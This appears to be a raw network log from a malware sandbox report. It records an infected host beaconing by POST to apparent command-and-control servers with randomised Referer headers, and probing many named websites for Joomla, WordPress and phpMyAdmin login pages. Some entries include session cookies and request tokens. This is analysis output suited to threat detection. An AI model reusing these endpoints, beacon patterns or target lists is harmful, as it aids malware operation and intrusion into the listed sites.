                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afpgbknmnoeicfre.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ooiokyouxnkw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qokjbpgcgvyfvg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpdebtibkom.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtwybnhquvbcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouftarcvyeqhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmwmngcskjub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nitnmyissvphwnbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axshrmdvbkhavl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxeyqyenuurxtjf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylakdtcynxnachde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftadycrkyfgg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kppwjvwswxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://soramsswvwtj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xsecnovmwcvurf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bucbtcuuqjcgt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nridljhbxir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chtljmxglxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsiqxrqycnt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kalnugefedcgxyw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppvryxvoper.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxrkxksjynxpq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvxbbmfkkatqvmp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jasglbrjehkss.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkdsxtrnnsilv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hikiougahtwnlcja.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrsrbinqble.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlbpwjtrbugwgo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmikpaylaogyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pemmtfcscbh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viafddhhylriois.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxymvrbwnrtai.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aypwsbxabcck.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwmciwewihyndri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://malibusands.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mcsmk8.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://3marc.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: __RequestVerificationToken=9Tw4eBQMtJgww6r2d6xlIUkI77SdB-d_QbVeWe2xleWw9E4exyU-bCgcjVhGShYDr4w6sPQ_lWAp-mq26ZSEINgjwx9o2Wpwu8Yy7vq2iaI1; ASP.NET_SessionId=setawluaocoer3ouv5bzrxfgUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: __RequestVerificationToken=L4fpWIQFNsub_ozR1dLpTZAJEWIJbg0-lgoDkDO8Qi8CWGprPFppiqDMoPZXNqF4WckQK4Xpzk7D75Wvq450-nfzCBGxRAFFOm9JKEQ5MEM1; ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44xUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://malibusands.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
